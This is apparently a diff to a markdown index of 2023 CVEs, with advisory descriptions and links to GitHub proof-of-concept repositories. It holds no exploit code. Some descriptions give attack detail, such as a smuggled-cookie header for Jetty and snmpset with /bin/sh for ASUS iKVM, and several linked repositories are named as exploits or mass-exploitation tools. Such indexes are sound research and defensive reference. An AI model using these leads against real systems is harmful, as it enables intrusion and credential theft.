+- [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035)
+- [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035)
+- [Faelian/zoneminder_CVE-2023-26035](https://github.com/Faelian/zoneminder_CVE-2023-26035)
+
+### CVE-2023-26048 (2023-04-18)
+
+Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).
+
+
+- [Trinadh465/jetty_9.4.31_CVE-2023-26048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26048)
+- [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048)
+
+### CVE-2023-26049 (2023-04-18)
+
+Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.
+
+
+- [hshivhare67/Jetty_v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2023-26049)
+
+### CVE-2023-26067 (2023-04-10)
+
+Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
+
+
+- [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067)
+
+### CVE-2023-26136 (2023-07-01)
+
+Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
+
+
+- [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment)
+- [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security)
+
+### CVE-2023-26144 (2023-09-20)
+
+Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.\r\r**Note:** It was not proven that this vulnerability can crash the process.
+
+
+- [tadhglewis/apollo-koa-minimal](https://github.com/tadhglewis/apollo-koa-minimal)
+
+### CVE-2023-26255 (2023-02-28)
+
+An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
+
+
+- [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp)
+- [Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6)
+
+### CVE-2023-26256 (2023-02-28)
+
+An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.
+
+
+- [0x7eTeam/CVE-2023-26256](https://github.com/0x7eTeam/CVE-2023-26256)
+- [xhs-d/CVE-2023-26256](https://github.com/xhs-d/CVE-2023-26256)
+- [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256)
+- [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256)
+
+### CVE-2023-26269 (2023-04-03)
+
+Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a \nmalicious local user.\n\nAdministrators are advised to disable JMX, or set up a JMX password.\n\nNote that version 3.7.4 onward will set up a JMX password automatically for Guice users.\n\n\n
+
+
+- [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269)
+
+### CVE-2023-26360 (2023-03-23)
+
+Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.
+
+
+- [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360)
+- [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit)
+
+### CVE-2023-26469 (2023-08-17)
+
+In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+
+
+- [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469)
+
+### CVE-2023-26602 (2023-02-26)
+
+ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.
+
+
+- [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602)
+
+### CVE-2023-26607 (2023-02-26)
+
+In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.
+
+
+- [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607)
+
+### CVE-2023-26609 (2023-02-27)
+
+ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.
+
+
+- [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609)
+
+### CVE-2023-26818 (2023-05-19)
+
+Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone ,or video recording via the DYLD_INSERT_LIBRARIES flag.
+
+
+- [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818)
+
+### CVE-2023-27100 (2023-03-22)
+
+Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.
+
+
+- [fabdotnet/CVE-2023-27100](https://github.com/fabdotnet/CVE-2023-27100)
+
+### CVE-2023-27163 (2023-03-31)
+
+request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
+
+
+- [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163)
+- [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163)
+- [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163)
+- [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC)
+- [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163)
+- [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53)
+- [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163)
+- [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163)
+- [cowsecurity/CVE-2023-27163](https://github.com/cowsecurity/CVE-2023-27163)
+- [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber)
+- [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163)
+- [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft)
+- [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163)
+- [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163)
+- [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163)
+
+### CVE-2023-27350 (2023-04-20)
+
+This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
+
+
+- [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350)
+- [rasan2001/CVE-2023-27350](https://github.com/rasan2001/CVE-2023-27350)
+
+### CVE-2023-27363 (2024-05-03)
+
+Foxit PDF Reader exportXFAData Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the exportXFAData method. The application exposes a JavaScript interface that allows writing arbitrary files. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19697.
+
+
+- [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-)
+
+### CVE-2023-27372 (2023-02-28)
+
+SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
+
+
+- [0SPwn/CVE-2023-27372-PoC](https://github.com/0SPwn/CVE-2023-27372-PoC)
+- [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC)
+- [ThatNotEasy/CVE-2023-27372](https://github.com/ThatNotEasy/CVE-2023-27372)
+- [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC)
+
+### CVE-2023-27470 (2023-09-11)
+
+BASupSrvcUpdater.exe in N-able Take Control Agent through 7.0.41.1141 before 7.0.43 has a TOCTOU Race Condition via a pseudo-symlink at %PROGRAMDATA%\GetSupportService_N-Central\PushUpdates, leading to arbitrary file deletion.
+
+
+- [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise)
+
+### CVE-2023-27524 (2023-04-24)
+
+Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.\n\nAll superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database.\nAdd a strong SECRET_KEY to your `superset_config.py` file like:\n\nSECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>\n\nAlternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.\n
+
+
+- [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524)
+- [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE)
+- [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-)
+- [NguyenCongHaiNam/Research-CVE-2023-27524](https://github.com/NguyenCongHaiNam/Research-CVE-2023-27524)
+- [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524)
+- [Cappricio-Securities/CVE-2023-27524](https://github.com/Cappricio-Securities/CVE-2023-27524)
+
+### CVE-2023-27564 (2023-05-10)
+
+The n8n package 0.218.0 for Node.js allows Information Disclosure.
+
+
+- [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564)
+
+### CVE-2023-27997 (2023-06-13)
+
+A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
+
+
+- [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS)
+- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997)
+- [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997)
+- [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997)
+- [awchjimmy/CVE-2023-27997-tutorial](https://github.com/awchjimmy/CVE-2023-27997-tutorial)
+
+### CVE-2023-28121 (2023-04-12)
+
+An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
+
+
+- [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121)
+- [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec)
+- [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121)
+- [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121)
+- [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121)
+
+### CVE-2023-28197 (2024-01-10)
+
+An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data.
+
+
+- [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol)
+
+### CVE-2023-28229 (2023-04-11)
+
+Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
+
+
+- [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229)
+
+### CVE-2023-28252 (2023-04-11)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252)
+- [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-)
+- [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252)
+- [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe)
+- [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252)
+
+### CVE-2023-28329 (2023-03-23)
+
+Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers).
+
+
+- [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329)
+
+### CVE-2023-28330 (2023-03-23)
+
+Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default.
+
+
+- [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330)
+
+### CVE-2023-28343 (2023-03-14)
+
+OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
+
+
+- [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343)
+
+### CVE-2023-28432 (2023-03-22)
+
+Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY`\nand `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
+
+
+- [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432)
+- [Chocapikk/CVE-2023-28432](https://github.com/Chocapikk/CVE-2023-28432)
+- [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432)
+- [unam4/CVE-2023-28432-minio_update_rce](https://github.com/unam4/CVE-2023-28432-minio_update_rce)
+- [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432)
+- [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432)
+- [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432)
+- [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432)
+
+### CVE-2023-28467 (2023-05-22)
+
+In MyBB before 1.8.34, there is XSS in the User CP module via the user email field.
+
+
+- [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467)
+
+### CVE-2023-28588 (2023-12-05)
+
+Transient DOS in Bluetooth Host while rfc slot allocation.
+
+
+- [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588)
+- [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588)
+- [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt)
+- [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile)
+- [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588)
+- [uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile)
+
+### CVE-2023-29017 (2023-04-06)
+
+vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.
+
+
+- [passwa11/CVE-2023-29017-reverse-shell](https://github.com/passwa11/CVE-2023-29017-reverse-shell)
+
+### CVE-2023-29357 (2023-06-13)
+
+Microsoft SharePoint Server Elevation of Privilege Vulnerability
+
+
+- [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357)
+- [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357)
+- [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE)
+- [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint)
+- [Jev1337/CVE-2023-29357-Check](https://github.com/Jev1337/CVE-2023-29357-Check)
+
+### CVE-2023-29360 (2023-06-13)
+
+Microsoft Streaming Service Elevation of Privilege Vulnerability
+
+
+- [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360)
+
+### CVE-2023-29406 (2023-07-11)
+
+The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
+
+
+- [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes)
+
+### CVE-2023-29409 (2023-08-02)
+
+Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
+
+
+- [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409)
+
+### CVE-2023-29439 (2023-05-16)
+
+Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
+
+
+- [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439)
+
+### CVE-2023-29489 (2023-04-27)
+
+An issue was discovered in cPanel before 11.109.9999.116. XSS can occur on the cpsrvd error page via an invalid webcall ID, aka SEC-669. The fixed versions are 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31.
+
+
+- [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177)
+- [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489)
+- [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489)
+- [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-)
+- [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489)
+- [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023)
+- [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489)
+- [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489)
+- [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489)
+
+### CVE-2023-29922 (2023-04-19)
+
+PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
+
+
+- [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-)
+
+### CVE-2023-30033
+- [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033)
+
+### CVE-2023-30190
+- [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA)
+
+### CVE-2023-30226 (2023-07-12)
+
+An issue was discovered in function get_gnu_verneed in rizinorg Rizin prior to 0.5.0 verneed_entry allows attackers to cause a denial of service via crafted elf file.
+
+
+- [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226)
+
+### CVE-2023-30253 (2023-05-29)
+
+Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
+
+
+- [Rubikcuv5/cve-2023-30253](https://github.com/Rubikcuv5/cve-2023-30253)
+- [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit)
+- [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
+- [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC)
+- [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253)
+
+### CVE-2023-30258 (2023-06-23)
+
+Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
+
+
+- [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup)
+
+### CVE-2023-30367 (2023-07-26)
+
+Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
+
+
+- [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper)
+
+### CVE-2023-30383 (2023-07-18)
+
+TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.
+
+
+- [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383)
+
+### CVE-2023-30533 (2023-04-24)
+
+SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected.
+
+
+- [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533)
+
+### CVE-2023-30547 (2023-04-17)
+
+vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.
+
+
+- [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547)
+- [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547)
+- [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547)
+- [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547)
+
+### CVE-2023-30765 (2023-07-10)
+
+\nDelta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.\n\n
+
+
+- [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765)
+
+### CVE-2023-30845 (2023-04-26)
+
+ESPv2 is a service proxy that provides API management capabilities using Google Service Infrastructure. ESPv2 2.20.0 through 2.42.0 contains an authentication bypass vulnerability. API clients can craft a malicious `X-HTTP-Method-Override` header value to bypass JWT authentication in specific cases.\n\nESPv2 allows malicious requests to bypass authentication if both the conditions are true: The requested HTTP method is **not** in the API service definition (OpenAPI spec or gRPC `google.api.http` proto annotations, and the specified `X-HTTP-Method-Override` is a valid HTTP method in the API service definition. ESPv2 will forward the request to your backend without checking the JWT. Attackers can craft requests with a malicious `X-HTTP-Method-Override` value that allows them to bypass specifying JWTs. Restricting API access with API keys works as intended and is not affected by this vulnerability.\n\nUpgrade deployments to release v2.43.0 or higher to receive a patch. This release ensures that JWT authentication occurs, even when the caller specifies `x-http-method-override`. `x-http-method-override` is still supported by v2.43.0+. API clients can continue sending this header to ESPv2.
+
+
+- [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845)
+
+### CVE-2023-30861 (2023-05-02)
+
+Flask is a lightweight WSGI web application framework. When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches `Set-Cookie` headers, it may send one client's `session` cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met.\n\n1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.\n2. The application sets `session.permanent = True`\n3. The application does not access or modify the session at any point during a request.\n4. `SESSION_REFRESH_EACH_REQUEST` enabled (the default).\n5. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.\n\nThis happens because vulnerable versions of Flask only set the `Vary: Cookie` header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. This issue has been fixed in versions 2.3.2 and 2.2.5.
+
+
+- [JawadPy/CVE-2023-30861-Exploit](https://github.com/JawadPy/CVE-2023-30861-Exploit)
+
+### CVE-2023-30943 (2023-05-02)
+
+The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.
+
+
+- [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943)
+- [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943)
+- [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943)
+
+### CVE-2023-31290 (2023-04-27)
+
+Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address.
+
+
+- [oooooorest/py_trustwallet_wasm](https://github.com/oooooorest/py_trustwallet_wasm)
+
+### CVE-2023-31320 (2023-11-14)
+
+Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.\n\n\n\n\n\n\n\n\n\n\n\n\n
+
+
+- [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320)
+
+### CVE-2023-31346 (2024-02-13)
+
+Failure to initialize\nmemory in SEV Firmware may allow a privileged attacker to access stale data\nfrom other guests.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+
+
+- [Freax13/cve-2023-31346-poc](https://github.com/Freax13/cve-2023-31346-poc)
+
+### CVE-2023-31419 (2023-10-26)
+
+A flaw was discovered in Elasticsearch, affecting the _search API that allowed a specially crafted query string to cause a Stack Overflow and ultimately a Denial of Service.\n\n\n\n\n
+
+
